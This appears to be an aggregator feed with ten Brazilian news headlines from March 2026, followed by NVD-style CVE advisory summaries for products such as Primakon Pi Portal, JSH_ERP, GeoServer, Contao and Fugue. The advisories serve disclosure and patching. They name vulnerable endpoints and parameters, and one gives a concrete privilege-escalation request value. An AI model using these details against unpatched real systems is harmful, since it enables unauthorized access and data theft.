[25/03/2026 17:13] Gilmar, Dino, Moraes e Zanin propõem limitar penduricalhos a 35% do teto - CNN Brasil

[25/03/2026 13:09] Advogado de Bolsonaro passa a comandar a defesa do cunhado de Vorcaro - CartaCapital

[25/03/2026 16:03] Irã rejeita plano dos EUA para fim da guerra; Pentágono confirma envio de tropas paraquedistas à região - BBC

[25/03/2026 12:27] Alvo da PF, ex-sócio da Fictor integra o ‘Conselhão’ de Lula - Estadão

[25/03/2026 12:24] Policial militar agride estudantes dentro de colégio estadual no Rio - Jovem Pan

[25/03/2026 10:55] Restrição de visitas na domiciliar isola Bolsonaro e esvazia papel na articulação política em meio a revés do PL com Castro - O Globo

[25/03/2026 17:21] Governador em exercício do Rio adia convocação de eleição-tampão e diz que há dúvidas se pleito será direto ou indireto - O Globo

[25/03/2026 10:18] Flávio Bolsonaro lidera 2º turno contra Lula, dentro da margem de erro - Correio Braziliense

[25/03/2026 12:28] Gripen: Brasil lança primeira aeronave supersônica produzida no país - CNN Brasil

[25/03/2026 12:06] Senador com CNH vencida e carro sem placas ameaça PMs e tenta fugir de abordagem em SP - G1

[CVE-2025-61167] [Modified: 01-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] SIGB PMB v8.0.1.14 was discovered to contain multiple SQL injection vulnerabilities in the /opac_css/ajax_selector.php component via the id and datas parameters.

[CVE-2025-61168] [Modified: 01-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue in the cms_rest.php component of SIGB PMB v8.0.1.14 allows attackers to execute arbitrary code via unserializing an arbitrary file.

[CVE-2025-64063] [Modified: 01-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] Primakon Pi Portal 1.0.18 API endpoints fail to enforce sufficient authorization checks when processing requests. Specifically, a standard user can exploit this flaw by sending direct HTTP requests to administrative endpoints, bypassing the UI restrictions. This allows the attacker to manipulate data outside their assigned scope, including: Unauthorized Account modification, modifying/deleting arbitrary user accounts and changing passwords by sending a direct request to the user management API endpoint; Confidential Data Access, accessing and downloading sensitive organizational documents via a direct request to the document retrieval API; Privilege escalation, This vulnerability can lead to complete compromise of data integrity and confidentiality, and Privilege Escalation by manipulating core system functions.

[CVE-2025-64064] [Modified: 01-12-2025] [Analyzed] [V3.1 S8.8:HIGH] Primakon Pi Portal 1.0.18 /api/v2/pp_users endpoint fails to adequately check user permissions before processing a PATCH request to modify the PP_SECURITY_PROFILE_ID. Because of weak access controls any low level user can use this API and change their permission to Administrator by using PP_SECURITY_PROFILE_ID=2 inside body of request and escalate privileges.

[CVE-2025-64065] [Modified: 01-12-2025] [Analyzed] [V3.1 S8.8:HIGH] The Primakon Pi Portal 1.0.18 API /api/V2/pp_udfv_admin endpoint, fails to perform necessary server-side validation. The administrative LoginAs or user impersonation feature is vulnerable to a access control failure. This flaw allows any authenticated low-privileged user to execute a direct PATCH request, enabling them to impersonate any other arbitrary user, including application Administrators. This is due to a Broken Function Level Authorization failure (the function doesn't check the caller's privilege) compounded by an Insecure Design that permits a session switch without requiring the target user's password or an administrative token and only needs email of user.

[CVE-2025-64067] [Modified: 01-12-2025] [Analyzed] [V3.1 S5.3:MEDIUM] Primakon Pi Portal 1.0.18 API endpoints responsible for retrieving object-specific or filtered data (e.g., user profiles, project records) fail to implement sufficient server-side validation to confirm that the requesting user is authorized to access the requested object or dataset. This vulnerability can be exploited in two ways: Direct ID manipulation and IDOR, by changing an ID parameter (e.g., user_id, project_id) in the request, an attacker can access the object and data belonging to another user; and filter Omission, by omitting the filtering parameter entirely, an attacker can cause the endpoint to return an entire unfiltered dataset of all stored records for all users. This flaw leads to the unauthorized exposure of sensitive personal and organizational information.

[CVE-2025-65960] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.6:MEDIUM] Contao is an Open Source CMS. From version 4.0.0 to before 4.13.57, before 5.3.42, and before 5.6.5, back end users with precise control over the contents of template closures can execute arbitrary PHP functions that do not have required parameters. This issue has been patched in versions 4.13.57, 5.3.42, and 5.6.5. A workaround for this issue involves manually patching the Contao\Template::once() method.

[CVE-2025-65961] [Modified: 03-12-2025] [Analyzed] [V3.1 S3.3:LOW] Contao is an Open Source CMS. From version 4.0.0 to before 4.13.57, before 5.3.42, and before 5.6.5, it is possible to inject code into the template output that will be executed in the browser in the front end and back end. This issue has been patched in versions 4.13.57, 5.3.42, and 5.6.5. A workaround for this issue involves not using the affected templates or patch them manually.

[CVE-2025-12816] [Modified: 02-01-2026] [Analyzed] [V3.1 S8.6:HIGH] An interpretation-conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.

[CVE-2025-51742] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject(), introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads.

[CVE-2025-65647] [Modified: 01-12-2025] [Analyzed] [V3.1 S4.3:MEDIUM] Insecure Direct Object Reference (IDOR) in the Track order function in PHPGURUKUL Online Shopping Portal 2.1 allows information disclosure via the oid parameter.

[CVE-2025-51741] [Modified: 30-12-2025] [Analyzed] [V3.1 S7.5:HIGH] An issue was discovered in Veal98 Echo Open-Source Community System 2.2 thru 2.3 allowing an unauthenticated attacker to cause the server to send email verification messages to arbitrary users via the /sendEmailCodeForResetPwd endpoint potentially causing a denial of service to the server or the downstream users.

[CVE-2025-51743] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /materialCategory/addMaterialCategory endpoint is vulnerable to fastjson deserialization attacks.

[CVE-2025-51744] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks.

[CVE-2025-51745] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks.

[CVE-2025-51746] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks.

[CVE-2025-58360] [Modified: 12-12-2025] [Analyzed] [V3.1 S8.2:HIGH] GeoServer is an open source server that allows users to share and edit geospatial data. From version 2.26.0 to before 2.26.2 and before 2.25.6, an XML External Entity (XXE) vulnerability was identified. The application accepts XML input through a specific endpoint /geoserver/wms operation GetMap. However, this input is not sufficiently sanitized or restricted, allowing an attacker to define external entities within the XML request. This issue has been patched in GeoServer 2.25.6, GeoServer 2.26.3, and GeoServer 2.27.0.

[CVE-2025-21621] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.1:MEDIUM] GeoServer is an open source server that allows users to share and edit geospatial data. Prior to version 2.25.0, a reflected cross-site scripting (XSS) vulnerability exists in the WMS GetFeatureInfo HTML output format that enables a remote attacker to execute arbitrary JavaScript code in a victim's browser through specially crafted SLD_BODY parameters. This issue has been patched in version 2.25.0.

[CVE-2025-62703] [Modified: 30-12-2025] [Analyzed] [V3.1 S8.8:HIGH] Fugue is a unified interface for distributed computing that lets users execute Python, Pandas, and SQL code on Spark, Dask, and Ray with minimal rewrites. In version 0.9.2 and prior, there is a remote code execution vulnerability by pickle deserialization via FlaskRPCServer. The Fugue framework implements an RPC server system for distributed computing operations. In the core functionality of the RPC server implementation, I found that the _decode() function in fugue/rpc/flask.py directly uses cloudpickle.loads() to deserialize data without any sanitization. This creates a remote code execution vulnerability when malicious pickle data is processed by the RPC server. The vulnerability exists in the RPC communication mechanism where the client can send arbitrary serialized Python objects that will be deserialized on the server side, allowing attackers to execute arbitrary code on the victim's machine. This issue has been patched via commit 6f25326.

[CVE-2025-63735] [Modified: 09-01-2026] [Analyzed] [V3.1 S6.1:MEDIUM] A reflected Cross site scripting (XSS) vulnerability in Ruckus Unleashed 200.13.6.1.319 via the name parameter to the the captive-portal endpoint selfguestpass/guestAccessSubmit.jsp.